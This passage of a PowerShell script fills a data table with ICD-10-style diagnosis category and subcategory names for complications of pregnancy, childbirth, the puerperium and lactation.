classified","Peripartum cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Postpartum acute kidney failure") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Postpartum thyroiditis") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Postpartum mood disturbance") + $null = $DiagnosisList.Rows.Add("Other complications of the puerperium, not elsewhere classified","Anemia of the puerperium") + $null = $DiagnosisList.Rows.Add("Other complications of the puerperium, not elsewhere classified","Other complications of the puerperium, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Complication of the puerperium, unspecified","Complication of the puerperium, unspecified") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with pregnancy","Infection of nipple associated with pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with pregnancy","Infection of nipple associated with pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with pregnancy","Infection of nipple associated with pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with pregnancy","Infection of nipple associated with pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with the puerperium","Infection of nipple associated with the puerperium") + $null = $DiagnosisList.Rows.Add("Infection of nipple associated with lactation","Infection of nipple associated with lactation") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with pregnancy","Abscess of breast associated with pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with pregnancy","Abscess of breast associated with pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with pregnancy","Abscess of breast associated with pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with pregnancy","Abscess of breast associated with pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with the puerperium","Abscess of breast associated with the puerperium") + $null = $DiagnosisList.Rows.Add("Abscess of breast associated with lactation","Abscess of breast associated with lactation") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with pregnancy","Nonpurulent mastitis associated with pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with pregnancy","Nonpurulent mastitis associated with pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with pregnancy","Nonpurulent mastitis associated with pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with pregnancy","Nonpurulent mastitis associated with pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with the puerperium","Nonpurulent mastitis associated with the puerperium") + $null = $DiagnosisList.Rows.Add("Nonpurulent mastitis associated with lactation","Nonpurulent mastitis associated with lactation") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with pregnancy","Retracted nipple associated with pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with pregnancy","Retracted nipple associated with pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with pregnancy","Retracted nipple associated with pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with pregnancy","Retracted nipple associated with pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with the puerperium","Retracted nipple associated with the puerperium") + $null = $DiagnosisList.Rows.Add("Retracted nipple associated with lactation","Retracted nipple associated with lactation") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with pregnancy","Cracked nipple associated with pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with pregnancy","Cracked nipple associated with pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with pregnancy","Cracked nipple associated with pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with pregnancy","Cracked nipple associated with pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with the puerperium","Cracked nipple associated with the puerperium") + $null = $DiagnosisList.Rows.Add("Cracked nipple associated with lactation","Cracked nipple associated with lactation") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of breast associated with pregnancy and the puerperium","Unspecified disorder of breast associated with pregnancy and the puerperium") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of breast associated with pregnancy and the puerperium","Other disorders of breast associated with pregnancy and the puerperium") + $null = $DiagnosisList.Rows.Add("Agalactia","Agalactia") + $null = $DiagnosisList.Rows.Add("Hypogalactia","Hypogalactia") + $null = $DiagnosisList.Rows.Add("Suppressed lactation","Suppressed lactation") + $null = $DiagnosisList.Rows.Add("Galactorrhea","Galactorrhea") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of lactation","Unspecified disorders of lactation") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of lactation","Other disorders of lactation") + $null = $DiagnosisList.Rows.Add("Sequelae of complication of pregnancy, childbirth, and the puerperium","Sequelae of complication of pregnancy, childbirth, and the puerperium") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating pregnancy","Tuberculosis complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating pregnancy","Tuberculosis complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating pregnancy","Tuberculosis complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating pregnancy","Tuberculosis complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating childbirth","Tuberculosis complicating childbirth") + $null = $DiagnosisList.Rows.Add("Tuberculosis complicating the puerperium","Tuberculosis complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Syphilis complicating pregnancy","Syphilis complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Syphilis complicating pregnancy","Syphilis complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Syphilis complicating pregnancy","Syphilis complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Syphilis complicating pregnancy","Syphilis complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Syphilis complicating childbirth","Syphilis complicating childbirth") + $null = $DiagnosisList.Rows.Add("Syphilis complicating the puerperium","Syphilis complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating pregnancy","Gonorrhea complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating pregnancy","Gonorrhea complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating pregnancy","Gonorrhea complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating pregnancy","Gonorrhea complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating childbirth","Gonorrhea complicating childbirth") + $null = $DiagnosisList.Rows.Add("Gonorrhea complicating the puerperium","Gonorrhea complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating pregnancy","Other infections with a predominantly sexual mode of transmission complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating pregnancy","Other infections with a predominantly sexual mode of transmission complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating pregnancy","Other infections with a predominantly sexual mode of transmission complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating pregnancy","Other infections with a predominantly sexual mode of transmission complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating childbirth","Other infections with a predominantly sexual mode of transmission complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other infections with a predominantly sexual mode of transmission complicating the puerperium","Other infections with a predominantly sexual mode of transmission complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating pregnancy","Viral hepatitis complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating pregnancy","Viral hepatitis complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating pregnancy","Viral hepatitis complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating pregnancy","Viral hepatitis complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating childbirth","Viral hepatitis complicating childbirth") + $null = $DiagnosisList.Rows.Add("Viral hepatitis complicating the puerperium","Viral hepatitis complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating pregnancy","Other viral diseases complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating pregnancy","Other viral diseases complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating pregnancy","Other viral diseases complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating pregnancy","Other viral diseases complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating childbirth","Other viral diseases complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other viral diseases complicating the puerperium","Other viral diseases complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating pregnancy","Protozoal diseases complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating pregnancy","Protozoal diseases complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating pregnancy","Protozoal diseases complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating pregnancy","Protozoal diseases complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating childbirth","Protozoal diseases complicating childbirth") + $null = $DiagnosisList.Rows.Add("Protozoal diseases complicating the puerperium","Protozoal diseases complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating pregnancy","Human immunodeficiency virus [HIV] disease complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating pregnancy","Human immunodeficiency virus [HIV] disease complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating pregnancy","Human immunodeficiency virus [HIV] disease complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating pregnancy","Human immunodeficiency virus [HIV] disease complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating childbirth","Human immunodeficiency virus [HIV] disease complicating childbirth") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease complicating the puerperium","Human immunodeficiency virus [HIV] disease complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating pregnancy","Other maternal infectious and parasitic diseases complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating pregnancy","Other maternal infectious and parasitic diseases complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating pregnancy","Other maternal infectious and parasitic diseases complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating pregnancy","Other maternal infectious and parasitic diseases complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating childbirth","Other maternal infectious and parasitic diseases complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other maternal infectious and parasitic diseases complicating the puerperium","Other maternal infectious and parasitic diseases complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating pregnancy","Unspecified maternal infectious and parasitic disease complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating pregnancy","Unspecified maternal infectious and parasitic disease complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating pregnancy","Unspecified maternal infectious and parasitic disease complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating pregnancy","Unspecified maternal infectious and parasitic disease complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating childbirth","Unspecified maternal infectious and parasitic disease complicating childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified maternal infectious and parasitic disease complicating the puerperium","Unspecified maternal infectious and parasitic disease complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Anemia complicating pregnancy","Anemia complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Anemia complicating pregnancy","Anemia complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Anemia complicating pregnancy","Anemia complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Anemia complicating pregnancy","Anemia complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Anemia complicating childbirth","Anemia complicating childbirth") + $null = $DiagnosisList.Rows.Add("Anemia complicating the puerperium","Anemia complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating childbirth","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating the puerperium","Other diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating childbirth") + $null = $DiagnosisList.Rows.Add("Obesity complicating pregnancy, childbirth, and the puerperium","Obesity complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other endocrine, nutritional and metabolic diseases complicating pregnancy, childbirth and the puerperium","Endocrine, nutritional and metabolic diseases complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating childbirth") + $null = $DiagnosisList.Rows.Add("Alcohol use complicating pregnancy, childbirth, and the puerperium","Alcohol use complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating childbirth") + $null = $DiagnosisList.Rows.Add("Drug use complicating pregnancy, childbirth, and the puerperium","Drug use complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating childbirth") + $null = $DiagnosisList.Rows.Add("Tobacco use disorder complicating pregnancy, childbirth, and the puerperium","Smoking (tobacco) complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other mental disorders complicating pregnancy, childbirth, and the puerperium","Other mental disorders complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating childbirth") + $null = $DiagnosisList.Rows.Add("Diseases of the nervous system complicating pregnancy, childbirth, and the puerperium","Diseases of the nervous system complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating pregnancy","Diseases of the circulatory system complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating pregnancy","Diseases of the circulatory system complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating pregnancy","Diseases of the circulatory system complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating pregnancy","Diseases of the circulatory system complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating childbirth","Diseases of the circulatory system complicating childbirth") + $null = $DiagnosisList.Rows.Add("Diseases of the circulatory system complicating the puerperium","Diseases of the circulatory system complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating pregnancy","Diseases of the respiratory system complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating pregnancy","Diseases of the respiratory system complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating pregnancy","Diseases of the respiratory system complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating pregnancy","Diseases of the respiratory system complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating childbirth","Diseases of the respiratory system complicating childbirth") + $null = $DiagnosisList.Rows.Add("Diseases of the respiratory system complicating the puerperium","Diseases of the respiratory system complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating pregnancy","Diseases of the digestive system complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating pregnancy","Diseases of the digestive system complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating pregnancy","Diseases of the digestive system complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating pregnancy","Diseases of the digestive system complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating childbirth","Diseases of the digestive system complicating childbirth") + $null = $DiagnosisList.Rows.Add("Diseases of the digestive system complicating the puerperium","Diseases of the digestive system complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating pregnancy","Diseases of the skin and subcutaneous tissue complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating pregnancy","Diseases of the skin and subcutaneous tissue complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating pregnancy","Diseases of the skin and subcutaneous tissue complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating pregnancy","Diseases of the skin and subcutaneous tissue complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating childbirth","Diseases of the skin and subcutaneous tissue complicating childbirth") + $null = $DiagnosisList.Rows.Add("Diseases of the skin and subcutaneous tissue complicating the puerperium","Diseases of the skin and subcutaneous tissue complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Abnormal glucose complicating pregnancy, childbirth and the puerperium","Abnormal glucose complicating pregnancy") + $null = $DiagnosisList.Rows.Add("Abnormal glucose complicating pregnancy, childbirth and the puerperium","Abnormal glucose complicating childbirth") + $null = $DiagnosisList.Rows.Add("Abnormal glucose complicating pregnancy, childbirth and the puerperium","Abnormal glucose complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Streptococcus B carrier state complicating pregnancy, childbirth and the puerperium","Streptococcus B carrier state complicating pregnancy") + $null = $DiagnosisList.Rows.Add("Streptococcus B carrier state complicating pregnancy, childbirth and the puerperium","Streptococcus B carrier state complicating childbirth") + $null = $DiagnosisList.Rows.Add("Streptococcus B carrier state complicating pregnancy, childbirth and the puerperium","Streptococcus B carrier state complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other infection carrier state complicating pregnancy, childbirth and the puerperium","Other infection carrier state complicating pregnancy") + $null = $DiagnosisList.Rows.Add("Other infection carrier state complicating pregnancy, childbirth and the puerperium","Other infection carrier state complicating childbirth") + $null = $DiagnosisList.Rows.Add("Other infection carrier state complicating pregnancy, childbirth and the puerperium","Other infection carrier state complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating childbirth") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status complicating pregnancy, childbirth and the puerperium","Bariatric surgery status complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Other specified diseases and conditions complicating pregnancy, childbirth and the puerperium","Other specified diseases and conditions complicating pregnancy, childbirth and the puerperium") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating pregnancy","Malignant neoplasm complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating pregnancy","Malignant neoplasm complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating pregnancy","Malignant neoplasm complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating pregnancy","Malignant neoplasm complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating childbirth","Malignant neoplasm complicating childbirth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm complicating the puerperium","Malignant neoplasm complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating pregnancy","Injury, poisoning and certain other consequences of external causes complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating pregnancy","Injury, poisoning and certain other consequences of external causes complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating pregnancy","Injury, poisoning and certain other consequences of external causes complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating pregnancy","Injury, poisoning and certain other consequences of external causes complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating childbirth","Injury, poisoning and certain other consequences of external causes complicating childbirth") + $null = $DiagnosisList.Rows.Add("Injury, poisoning and certain other consequences of external causes complicating the puerperium","Injury, poisoning and certain other consequences of external causes complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating pregnancy","Physical abuse complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating pregnancy","Physical abuse complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating pregnancy","Physical abuse complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating pregnancy","Physical abuse complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating childbirth","Physical abuse complicating childbirth") + $null = $DiagnosisList.Rows.Add("Physical abuse complicating the puerperium","Physical abuse complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating pregnancy","Sexual abuse complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating pregnancy","Sexual abuse complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating pregnancy","Sexual abuse complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating pregnancy","Sexual abuse complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating childbirth","Sexual abuse complicating childbirth") + $null = $DiagnosisList.Rows.Add("Sexual abuse complicating the puerperium","Sexual abuse complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating pregnancy","Psychological abuse complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating pregnancy","Psychological abuse complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating pregnancy","Psychological abuse complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating pregnancy","Psychological abuse complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating childbirth","Psychological abuse complicating childbirth") + $null = $DiagnosisList.Rows.Add("Psychological abuse complicating the puerperium","Psychological abuse complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by maternal hypertensive disorders") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by maternal renal and urinary tract diseases") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by maternal infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present 